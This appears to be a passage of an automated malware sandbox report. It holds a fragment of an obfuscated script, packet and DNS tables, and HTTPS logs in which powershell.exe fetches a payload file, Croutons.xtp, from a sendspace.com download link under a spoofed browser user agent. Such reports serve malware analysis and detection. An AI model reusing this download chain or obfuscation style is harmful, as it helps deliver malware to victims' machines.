                                                      File Content Preview:..'Straitsmen hovedlinjernes sulfhydrate..'Couscouses bayonneskinker tommeskruen; heresimach bgetrernes,..Const Auskulterede = 64 ..'Mellemdistanceraket144. mummers stammefejdernes meiotically morth..'Ambulators grise acrolithic..'Undulately! funnyman sol

                                                      File Icon

                                                      Icon Hash:68d69b8f86ab9a86

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 23, 2024 18:24:05.861485958 CEST49730443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:05.861536980 CEST44349730172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:05.861633062 CEST49730443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:05.871645927 CEST49730443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:05.871668100 CEST44349730172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:06.354662895 CEST44349730172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:06.354868889 CEST49730443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:06.358622074 CEST49730443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:06.358632088 CEST44349730172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:06.359200954 CEST44349730172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:06.370312929 CEST49730443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:06.410537958 CEST44349730172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:06.888628960 CEST44349730172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:06.888789892 CEST44349730172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:06.888844967 CEST49730443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:06.891458988 CEST49730443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:06.964960098 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:06.965013981 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:06.965089083 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:06.965384960 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:06.965415001 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:07.690692902 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:07.693583012 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:07.693583012 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:07.693615913 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:07.693943024 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:07.695302010 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:07.738535881 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.323132038 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.323164940 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.323184967 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.323261023 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.323261023 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.323308945 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.323373079 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.335017920 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.335071087 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.335119009 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.335144997 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.335169077 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.335190058 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.413865089 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.413929939 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.414068937 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.414068937 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.414100885 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.414172888 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.426140070 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.426187992 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.426249981 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.426316023 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.426353931 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.426381111 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.435405970 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.435450077 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.435488939 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.435501099 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.435517073 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.435538054 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.444283962 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.444324970 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.444370031 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.444380045 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.444402933 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.444418907 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.506505013 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.506577015 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.506690025 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.506705999 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.506740093 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.506740093 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.513788939 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.513839006 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.513869047 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.513876915 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.513901949 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.513911963 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.521401882 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.521452904 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.521493912 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.521514893 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.521542072 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.521559954 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.533931971 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.533973932 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.534013033 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.534043074 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.534168005 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.534168005 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.594974995 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.595012903 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.595071077 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.595104933 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.595122099 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.595160007 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.602761030 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.602812052 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.602849007 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.602869987 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.602885008 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.602909088 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.611490011 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.611531973 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.611588001 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.611629963 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.611658096 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.611680031 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.617062092 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.617104053 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.617156982 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.617180109 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.617192984 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.617228031 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.624636889 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.624681950 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.624747992 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.624763966 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.624793053 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.624813080 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.631480932 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.631522894 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.631572962 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.631582975 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.631613970 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.631633043 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.654109955 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.654159069 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.654316902 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.654350042 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.654401064 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.660787106 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.660829067 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.660875082 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.660904884 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.660918951 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.660943031 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.687021017 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.687056065 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.687182903 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.687182903 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.687211037 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.687258005 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.692523003 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.692574024 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.692604065 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.692620993 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.692632914 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.692660093 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.697374105 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.697417974 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.697457075 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.697474003 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.697488070 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.697510004 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.701839924 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.701896906 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.701939106 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.701950073 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.701961040 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.701989889 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.705954075 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.705997944 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.706094027 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.706094027 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.706105947 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.706150055 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.709837914 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.709883928 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.709917068 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.709933043 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.709949017 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.709970951 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.744108915 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.744173050 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.744199991 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.744229078 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.744244099 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.744244099 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.744270086 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.772733927 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.772769928 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.772867918 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.772944927 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.773035049 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.777066946 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.777091026 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.777162075 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.777173996 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.777219057 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.779723883 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.779748917 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.779814959 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.779820919 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.779850006 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.779859066 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.780647039 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.780702114 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.780706882 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.780742884 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.780745029 CEST4434973169.31.136.57192.168.2.4
                                                      May 23, 2024 18:24:08.780783892 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:08.781132936 CEST49731443192.168.2.469.31.136.57
                                                      May 23, 2024 18:24:58.788613081 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:58.788696051 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:58.788809061 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:58.828202009 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:58.828237057 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:59.298937082 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:59.299043894 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:59.397644043 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:59.397670031 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:59.398799896 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:24:59.398891926 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:59.426181078 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:24:59.470499992 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:25:00.052546024 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:25:00.052721977 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:25:00.052726030 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:25:00.052813053 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:25:00.086716890 CEST49739443192.168.2.4172.67.170.105
                                                      May 23, 2024 18:25:00.086738110 CEST44349739172.67.170.105192.168.2.4
                                                      May 23, 2024 18:25:00.158967018 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:00.159079075 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:00.159174919 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:00.159460068 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:00.159492016 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:00.867283106 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:00.867399931 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:00.874780893 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:00.874802113 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:00.875047922 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:00.875113964 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:00.888694048 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:00.930516005 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.649799109 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.649888039 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.649929047 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.649957895 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.649964094 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.650017023 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.650029898 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.650094986 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.670989037 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.671000004 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.671169043 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.671183109 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.671286106 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.735253096 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.735318899 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.735384941 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.735414028 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.735431910 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.735460043 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.758692980 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.758723021 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.758821011 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.758846045 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.758899927 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.774223089 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.774245977 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.774308920 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.774318933 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.774368048 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.801302910 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.801346064 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.801517010 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.801517010 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.801546097 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.801595926 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.810553074 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.810636997 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.810645103 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.810693026 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.810758114 CEST49740443192.168.2.469.31.136.53
                                                      May 23, 2024 18:25:01.810842991 CEST4434974069.31.136.53192.168.2.4
                                                      May 23, 2024 18:25:01.810904026 CEST49740443192.168.2.469.31.136.53

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 23, 2024 18:24:05.844877005 CEST6395753192.168.2.41.1.1.1
                                                      May 23, 2024 18:24:05.856153011 CEST53639571.1.1.1192.168.2.4
                                                      May 23, 2024 18:24:06.893080950 CEST6244753192.168.2.41.1.1.1
                                                      May 23, 2024 18:24:06.964212894 CEST53624471.1.1.1192.168.2.4
                                                      May 23, 2024 18:25:00.102287054 CEST5477653192.168.2.41.1.1.1
                                                      May 23, 2024 18:25:00.157999992 CEST53547761.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      May 23, 2024 18:24:05.844877005 CEST192.168.2.41.1.1.10x6433Standard query (0)www.sendspace.comA (IP address)IN (0x0001)false
                                                      May 23, 2024 18:24:06.893080950 CEST192.168.2.41.1.1.10x7935Standard query (0)fs13n4.sendspace.comA (IP address)IN (0x0001)false
                                                      May 23, 2024 18:25:00.102287054 CEST192.168.2.41.1.1.10xbba1Standard query (0)fs12n1.sendspace.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      May 23, 2024 18:24:05.856153011 CEST1.1.1.1192.168.2.40x6433No error (0)www.sendspace.com172.67.170.105A (IP address)IN (0x0001)false
                                                      May 23, 2024 18:24:05.856153011 CEST1.1.1.1192.168.2.40x6433No error (0)www.sendspace.com104.21.28.80A (IP address)IN (0x0001)false
                                                      May 23, 2024 18:24:06.964212894 CEST1.1.1.1192.168.2.40x7935No error (0)fs13n4.sendspace.com69.31.136.57A (IP address)IN (0x0001)false
                                                      May 23, 2024 18:25:00.157999992 CEST1.1.1.1192.168.2.40xbba1No error (0)fs12n1.sendspace.com69.31.136.53A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • www.sendspace.com
                                                      • fs13n4.sendspace.com
                                                      • fs12n1.sendspace.com

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449730172.67.170.1054432656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-05-23 16:24:06 UTC174OUTGET /pro/dl/exw2o1 HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: www.sendspace.com
                                                      Connection: Keep-Alive
                                                      2024-05-23 16:24:06 UTC942INHTTP/1.1 301 Moved Permanently
                                                      Date: Thu, 23 May 2024 16:24:06 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: SID=tabm3uo2s6panln21pglgugjs5; path=/; domain=.sendspace.com
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Pragma: no-cache
                                                      Location: https://fs13n4.sendspace.com/dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2r0nRNYqO3g9pA9HpHpsb5ItWCSd1Fdj%2FT7RnkdFPFy2%2FzQpNKbOE9LDYdPsDr%2FgPllSjfriCeA2W%2BYd1sv5ZdhahA78wYxY5Ehzy9NVxpLrdpE%2BuCjXgCu9xvPRpozhHTyocw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 888664f02cc7192c-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-05-23 16:24:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.44973169.31.136.574432656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-05-23 16:24:07 UTC231OUTGET /dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: fs13n4.sendspace.com
                                                      Connection: Keep-Alive
                                                      2024-05-23 16:24:08 UTC497INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Thu, 23 May 2024 16:24:08 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 461284
                                                      Last-Modified: Wed, 15 May 2024 07:58:08 GMT
                                                      Connection: close
                                                      Set-Cookie: SID=n5q4jmb62ohugf57lv4oa1ja81; path=/; domain=.sendspace.com
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                      Content-Disposition: attachment;filename="Croutons.xtp"
                                                      ETag: "66446b10-709e4"
                                                      Accept-Ranges: bytes
